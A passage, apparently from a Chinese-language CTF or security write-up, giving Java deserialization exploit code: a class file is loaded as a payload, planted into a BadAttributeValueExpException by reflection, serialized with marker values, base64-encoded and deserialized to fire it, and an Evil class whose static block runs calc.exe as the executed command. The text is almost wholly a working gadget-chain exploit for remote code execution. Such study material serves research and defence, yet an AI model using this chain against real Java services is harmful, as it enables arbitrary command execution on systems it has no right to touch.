FileInputStream fis = new FileInputStream(clzFile); fis.read(clzBytes); //read file into bytes[] fis.close();
payload.setClassByte(clzBytes);
BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException("placeholder"); Field field = badAttributeValueExpException.getClass().getDeclaredField("val"); field.setAccessible(true); field.set(badAttributeValueExpException, payload);
ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
ObjectOutputStream out = new ObjectOutputStream(byteArrayOutputStream);
out.writeUTF("gadgets"); out.writeInt(2021);
out.writeObject(badAttributeValueExpException);
//String data = byteArrayOutputStream.toString(); String data = Tools.base64Encode(byteArrayOutputStream.toByteArray());
System.out.println(data); byte[] b = Tools.base64Decode(data); InputStream inputStream = new ByteArrayInputStream(b); ObjectInputStream objectInputStream = new ObjectInputStream(inputStream); String name = objectInputStream.readUTF(); int year = objectInputStream.readInt(); if (name.equals("gadgets") && year == 2021) { objectInputStream.readObject(); } }catch (Exception e){ e.printStackTrace(); } } }
Evil.java中写执行的命令就行了
1 2 3 4 5 6 7 8 9 10 11
publicclassEvil{ static{ try { Runtime r = Runtime.getRuntime(); Process p = r.exec(new String[]{"calc.exe"}); p.waitFor(); }catch (Exception e){ e.printStackTrace(); } } }